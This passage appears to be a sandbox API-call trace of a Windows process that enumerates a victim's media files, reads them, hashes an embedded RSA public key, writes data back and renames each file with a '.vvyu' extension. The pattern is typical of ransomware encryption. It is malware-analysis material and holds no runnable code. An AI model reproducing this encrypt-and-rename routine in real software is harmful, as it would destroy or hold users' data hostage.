(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a70 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ad0 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a88 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a58 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade860 | out: hHeap=0x2c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.296] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x9f06, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9f06, lpOverlapped=0x0) returned 1 [0199.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.297] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9f0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.297] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.298] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.299] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.299] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.299] CloseHandle (hObject=0x584) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0199.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0199.300] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\Q2aCngA1p.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\q2acnga1p.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\Q2aCngA1p.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\q2acnga1p.mp3.vvyu")) returned 1 [0199.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.302] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.304] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4105140, ftCreationTime.dwHighDateTime=0x1d89b62, ftLastAccessTime.dwLowDateTime=0x3ee24510, ftLastAccessTime.dwHighDateTime=0x1d8a000, ftLastWriteTime.dwLowDateTime=0x3ee24510, ftLastWriteTime.dwHighDateTime=0x1d8a000, nFileSizeHigh=0x0, nFileSizeLow=0xa29f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YWYWXYtY.mp3", cAlternateFileName="")) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.305] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\YWYWXYtY.mp3") returned=".mp3" [0199.305] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\YWYWXYtY.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\ywywxyty.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.306] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=41631) returned 1 [0199.306] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.310] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa279, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.310] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.313] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.313] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa29f, lpOverlapped=0x0) returned 1 [0199.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.314] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.315] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.315] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.315] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.315] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.315] GetLastError () returned 0x0 [0199.315] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.315] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.316] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.316] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.316] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa2a0) returned 0x2af7168 [0199.316] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade860 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade8a8 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.317] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a88 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6a70 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.320] 